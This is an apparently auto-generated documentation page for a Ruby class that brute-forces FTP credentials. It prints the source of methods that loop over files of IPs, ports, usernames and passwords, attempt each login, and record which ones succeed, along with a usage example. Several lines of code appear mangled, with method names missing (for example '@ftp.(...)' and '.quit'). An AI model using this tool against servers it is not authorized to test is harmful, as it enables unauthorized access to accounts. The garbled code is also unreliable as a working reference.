Class: ViolentRuby::FtpBruteForcer

Inherits:
Object
  • Object
show all
Defined in:
lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb

Overview

The Ftp Brute Forcer class provides a simply way to brute-force an FTP server’s credentials.

Examples:

Basic Usage

ftp = FtpBruteForcer.new
ftp.users     = "resources/ftp_users.txt"
ftp.passwords = "resources/ftp_passwords.txt"
ftp.ips       = "resources/ftp_ips.txt"
ftp.ports     = "resources/ftp_ports.txt"
# brue'm!
ftp.brute_force!
# => results

Author:

  • Kent ‘picat’ Gruber

Instance Attribute Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(args = {}) ⇒ FtpBruteForcer

Create a new Ftp Brute Forcer.

Parameters:

  • args (Hash) (defaults to: {})

    The options to create a new Ftp Brute Forcer.

  • args (String) (defaults to: {})

    :users The path to a file of users to attempt.

  • args (String) (defaults to: {})

    :passwords The path to a file of passwords to attempt.

  • args (String) (defaults to: {})

    :ips The path to a file of server ips to attempt to connect to.

  • args (String) (defaults to: {})

    :ports The path to a file of service ports to attempt to connect to.



35
36
37
38
39
40
41
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 35

def initialize(args = {})
	@users     = args[:users]     if args[:users]     && File.readable?(args[:users]) 
	@passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
	@ips       = args[:ips]       if args[:ips]       && File.readable?(args[:ips])
	@ports     = args[:ports]     if args[:ports]     && File.readable?(args[:ports])
	@ftp       = Net::FTP.new
end

Instance Attribute Details

#ipsObject 



24
25
26
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 24

def ips
  @ips
end

#passwordsObject 



22
23
24
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 22

def passwords
  @passwords
end

#portsObject 



26
27
28
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 26

def ports
  @ports
end

#usersObject 



20
21
22
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 20

def users
  @users
end

Instance Method Details

#able_to_login?(args = {}) ⇒ Boolean

Check if a given IP address, port, username and passwords are correct to login.

Parameters:

  • args (Hash) (defaults to: {})
  • args (String) (defaults to: {})

    :ip

  • args (String) (defaults to: {})

    :port

  • args (String) (defaults to: {})

    :username

  • args (String) (defaults to: {})

    :password

Returns:

  • (Boolean)

See Also:



102
103
104
105
106
107
108
109
110
111
112
113
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 102

def able_to_login?(args = {})
	@ftp.connect(args[:ip], args[:port])
	@ftp.(args[:username], args[:password]) 
	if @ftp.welcome == "230 Login successful.\n"
		@ftp.close
		return true
	end
	.quit
	false
rescue
	false
end

#brute_force(args = {}) ⇒ Object Also known as: brute_force!

Brute force some’a dem FTP login credz.

Parameters:

  • args (Hash) (defaults to: {})

    The options to brute force.

  • args (String) (defaults to: {})

    :users The path to a file of users to attempt.

  • args (String) (defaults to: {})

    :passwords The path to a file of passwords to attempt.

  • args (String) (defaults to: {})

    :ips The path to a file of server ips to attempt to connect to.

  • args (String) (defaults to: {})

    :ports The path to a file of service ports to attempt to connect to.



50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 50

def brute_force(args = {})
	meets_our_requirements?(args) 
	results   = []
	ips       = args[:ips]        || @ips 
	ports     = args[:ports]      || @ports
	users     = args[:users]      || @users
	passwords = args[:passwords]  || @passwords
	iterate_over(ips).each do |ip|
		iterate_over(ports).each do |port|
			next unless connectable?(ip: ip, port: port)
			iterate_over(users).each do |user|
				iterate_over(passwords).each do |password|
					if able_to_login?(ip: ip, port: port, username: user, password: password)
						result = format_result("SUCCESS", ip, port, user, password)
					else
						result = format_result("FAILURE", ip, port, user, password)
					end
					results << result
					yield result if block_given?
				end
			end
		end
	end
	results
end

#connectable?(args = {}) ⇒ Boolean

Check if a given IP address and port can connceted to.

Parameters:

  • args (Hash) (defaults to: {})

    the options to brute force.

  • args (String) (defaults to: {})

    :ip The ip address to attempt to connect to.

  • args (String) (defaults to: {})

    :port The port to attempt to connect to.

Returns:

  • (Boolean)

See Also:



85
86
87
88
89
90
91
 
# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 85

def connectable?(args = {})
	@ftp.connect(args[:ip], args[:port])
	return true if @ftp.last_response_code == "220"
	false
rescue
	false
end